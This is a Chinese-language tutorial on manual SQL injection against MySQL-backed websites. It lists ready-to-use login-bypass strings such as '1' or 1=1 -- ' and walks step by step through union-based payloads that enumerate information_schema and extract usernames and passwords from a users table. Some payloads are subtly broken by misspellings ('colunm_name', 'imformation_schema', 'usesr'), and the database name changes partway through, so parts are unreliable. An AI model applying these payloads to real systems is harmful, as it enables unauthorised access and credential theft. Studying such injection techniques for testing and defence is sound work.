mysql手工注入
一、SQL注入的理解
将特殊SQL语句添加到查询url后面,以获取非法的数据的操作。
1.布尔注入 //返回真或假
2.联合注入 //一起查询
3.延时注入 //定时器查询
4.报错注入 //报错,但信息是我们想要的
二、布尔注入
布尔注入可以用在密码绕过这块。原理:利用引号提前闭合SQL语句 和 or的一真即真 的特点相结合进行密码绕过。
正常输入用户名和密码时执行的SQL如下:select username,password from admin where username = 'root' and password = ‘123456’;
利用密码绕过登录时执行的SQL如下:
select username,password from admin where username = '1' or 1=1 -- ' and password = '123';
密码绕过常用的代码:
1' or 1=1 -- '
1' or 2>1 -- '
1' or true -- '
注:这里 -- 是注释作用
三、联合注入
联合查询需要经过一下步骤:
1.判断注入点
利用 and 1=1 和and 1=2来判断是否是注入点。
2.爆出当前查询列数
利用 order by 或者 group by 结合折中法爆出当前查询总的字段数。猜到4时报错,猜到3时正常,说明列数为3。
3.爆可显位置
爆出的长度为3,参数值想办法让其报错(可以加负号等),然后进行联合查询?id=-1 union select 1,2,3 爆出可显位置。爆出位置2和3。
4.利用可显位置爆出数据库名。此时也可以爆出数据库版本、当前用户、数据库路径、数据库名称等相关信息
version--mysql版本
user--数据库用户
database--数据库名
@datadir--数据库路径
@@versioncompileos--操作系统
5.爆表名
(1)用点连接库下存放表名的tables表
(2)然后用where来精确查询存放在table_schema中的库名
(3)用limit函数来进行遍历
(4)用-- 注释防止报错
最终payload为:
union select 1,2,table_name from information_schema.tables where table_schema='sqlzhuru' limit 1,1 --+
拿到记录账号密码的users表
6.爆字段
爆出表名后,接下来爆想要的列名,思路如上,遍历出想要的字段,username和password。
最终payload为:
union select 1,2,colunm_name from imformation_schema.colunms where table_schema='sqlzhuru' and table_name='usesr' limit 1,1 --+
修改limit函数,遍历第二个想要的列名 union select 1,2,column_name from information_schema.columns where table_schema=’security’and table_name=’users’ limit 2,1 --+
7.整合信息爆出用户名和密码
union select 1,username,password from users limit 1,1 --+
